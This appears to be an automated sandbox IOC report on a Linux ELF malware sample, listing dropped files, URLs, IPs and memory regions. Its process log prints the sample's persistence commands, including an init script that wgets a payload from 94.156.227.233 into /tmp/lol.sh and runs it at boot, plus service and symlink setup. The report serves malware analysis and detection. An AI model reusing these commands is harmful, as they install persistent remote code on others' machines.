IOC Report
x86_32.nn.elf

Files

| File Path | Type | Category | Malicious |
| --- | --- | --- | --- |
| x86_32.nn.elf | ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped | initial sample | malicious |
| /etc/init.d/sh | POSIX shell script, ASCII text executable | dropped | malicious |
| /etc/init.d/system | POSIX shell script, ASCII text executable | dropped | malicious |
| /etc/profile | ASCII text | dropped | malicious |
| /etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious |
| /boot/bootcmd | ASCII text | dropped | |
| /etc/inittab | ASCII text | dropped | |
| /etc/motd | ASCII text | dropped | |
| /etc/systemd/system/custom.service | ASCII text | dropped | |
| /memfd:snapd-env-generator (deleted) | ASCII text | dropped | |

Processes

Path
Cmdline
Malicious
/tmp/x86_32.nn.elf
/tmp/x86_32.nn.elf
/tmp/x86_32.nn.elf
-
/bin/sh
sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh
-
/usr/bin/systemctl
systemctl enable custom.service
/tmp/x86_32.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/system
/tmp/x86_32.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/x86_32.nn.elf
-
/bin/sh
sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh'\n /bin/sh &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh'\n killall sh\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh"
/tmp/x86_32.nn.elf
-
/bin/sh
sh -c "chmod +x /etc/init.d/sh >/dev/null 2>&1"
/bin/sh
-
/usr/bin/chmod
chmod +x /etc/init.d/sh
/tmp/x86_32.nn.elf
-
/bin/sh
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh
-
/usr/bin/mkdir
mkdir -p /etc/rc.d
/tmp/x86_32.nn.elf
-
/bin/sh
sh -c "ln -s /etc/init.d/sh /etc/rc.d/S99sh >/dev/null 2>&1"
/bin/sh
-
/usr/bin/ln
ln -s /etc/init.d/sh /etc/rc.d/S99sh
/tmp/x86_32.nn.elf
-
/tmp/x86_32.nn.elf
-
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd
-
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd
-
/usr/sbin/dumpe2fs
dumpe2fs -h /dev/dm-0

URLs

| Name | IP | Malicious |
| --- | --- | --- |
| http://94.156.227.233/lol.sh | unknown | |
| http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/s | unknown | |
| http://94.156.227.233/ | unknown | |

Domains

| Name | IP | Malicious |
| --- | --- | --- |
| daisy.ubuntu.com | 162.213.35.25 | |

IPs

| IP | Domain | Country | Malicious |
| --- | --- | --- | --- |
| 185.125.190.26 | unknown | United Kingdom | |
| 94.156.227.234 | unknown | Bulgaria | |

Memdumps

Base Address
Regiontype
Protect
Malicious
805b000
page execute read
malicious
ffe63000
page read and write
805e000
page read and write
823c000
page read and write
805c000
page read and write
f7fa0000
page execute read